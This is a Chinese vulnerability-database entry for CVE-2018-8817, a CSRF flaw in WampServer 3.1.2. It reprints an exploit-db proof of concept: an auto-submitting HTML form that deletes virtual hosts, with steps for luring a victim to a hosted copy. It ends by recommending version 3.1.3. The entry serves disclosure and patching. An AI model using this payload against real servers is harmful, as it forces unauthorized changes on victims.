Wampserver 跨站请求伪造漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1124936 漏洞类型 跨站请求伪造
发布时间 2018-04-02 更新时间 2019-06-12
CVE编号 CVE-2018-8817 CNNVD-ID CNNVD-201803-841
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/44385
https://cxsecurity.com/issue/WLB-2018040015
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201803-841
|漏洞详情
WampServer是一套用于Windows平台的Apache、Mysql和PHP集成安装环境。 Wampserver 3.1.3之前版本中的add_vhost.php文件存在跨站请求伪造漏洞。远程攻击者可利用该漏洞执行未授权的操作。
|漏洞EXP
# Exploit Title: WampServer 3.1.2 CSRF to add or delete any virtual hostsremotely
# Date: 31-03-2018
# Software Link: http://www.wampserver.com/en/
# Version: 3.1.2
# Tested On: Windows 10
# Exploit Author: Vipin Chaudhary
# Contact: http://twitter.com/vipinxsec
# Website: http://medium.com/@vipinxsec
# CVE: CVE-2018-8817


1. Description

CSRF (Cross site request forgery) in WampServer 3.1.2 which allows a remote
attacker to force any victim to add or delete virtual hosts.

http://forum.wampserver.com/read.php?2,138295,150722,page=6#msg-150722

2. Proof of Concept

How to exploit this CSRF vulnerability:
1. Go to Add a Virtual host and add one to wampserver.
2. Now intercept the request with proxy tool like burp suite.
3. Now make a CSRF PoC of the request and to exploit you can host it on
internet and send the link to the victim.

*Exploit Code for deleting any host remotely:*

1. Copy and paste this CSRF request in notepad and save it as anything.html
<html>
  <body onload="wamp_csrf.submit();">
    <form action="http://localhost/add_vhost.php?lang=english"
name="wamp_csrf" method="POST">
      <input type="hidden" name="virtual_del[]"
value="localhost" />
      <input type="hidden" name="vhostdelete" value="Suppress VirtualHost"
/>
    </form>
  </body>
</html>

2. Then run it on your installed vulnerable wampserver.

3. Solution:

Update to version 3.1.3
http://www.wampserver.com/en/#download-wrapper
|参考资料

来源:MISC
链接:http://forum.wampserver.com/read.php?2,138295,150722,page=6#msg-150722